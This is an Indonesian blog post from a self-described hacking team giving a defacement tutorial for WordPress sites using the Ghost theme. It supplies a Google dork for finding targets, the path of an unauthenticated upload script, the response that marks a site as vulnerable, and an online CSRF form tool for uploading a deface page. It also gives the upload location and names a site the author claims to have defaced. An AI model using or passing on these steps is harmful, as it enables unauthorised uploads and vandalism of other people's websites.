Assalamualaikum Wr.Wb , Hai Kali Ini Mr.Noub93 Akan Memberikan Tutorial Deface Metode Wp Ghost Theme
Nexus Cyber Team Official
Bahan - Bahannya :1. Google / Browser Kalian
2. Dork + Exploit
3. Kuota Internet
4. Sc Deface Kalian + Tools Crsf Online (Di Google Banyak)
5.Rokok
Dorknya :
inurl:/wp-content/themes/ghost/
Exploit nya:
wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
Okh, Pertama² Kalian Dorking Dork Itu Di Google Atau Browser Kalian....
Setelah Kalian Dorking , Kalian cari salah satu website Yang Vuln:v
Jika kalian mau Tau Website Yang Vuln Untuk Di Upload file , Kalian Sisakan Domain Webnya saja + Exploit nya
Contoh web vuln :
http://hazeteam.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
Kalau Ada kata² "{"status":"NOK", "ERR":"This file is incorect"}" Berarti Website Itu Vuln Untuk di deface
Lanjut....
Kalian Cari di google "Tools crsf online" nya di google ,
Web Tools Crsfnya Yang saya Pakai :
https://earthseed.space/csrf.php
Kalian Masukin Url website yang vuln tadi, Dan Di bawahnya kalian masukin kata "Filedata" Tanda kutipnya ilangin asu:v , Setelah Itu kunci aja tuh , Dan kalian Upload Sc Deface mu
Kalau berhasil akan ada kata² "{"status":"OK","imageID":"whtml","imageName":"w.html","html":"\n\t\n\t\t
html File<\/div><\/td>\n\t\tw.html
\n\t\t\t[Delete]<\/a>\n\t\t<\/td>\n\t<\/tr>\n"}"
Cara manggil webnya : http://sitetarget.com/wp-content/uploads/settingsimages/scdepeskalian.html
ATAU /uploads/settingsimages/sclu.hmtl
Contoh Web Yang Tadi Saya Deface :
http://hazeteam.com/wp-content/uploads/settingsimages/y.html
Done !!!
Jangan Lupa Subcribe Yt Nexus Cyber Team
Tidak ada komentar:
Posting Komentar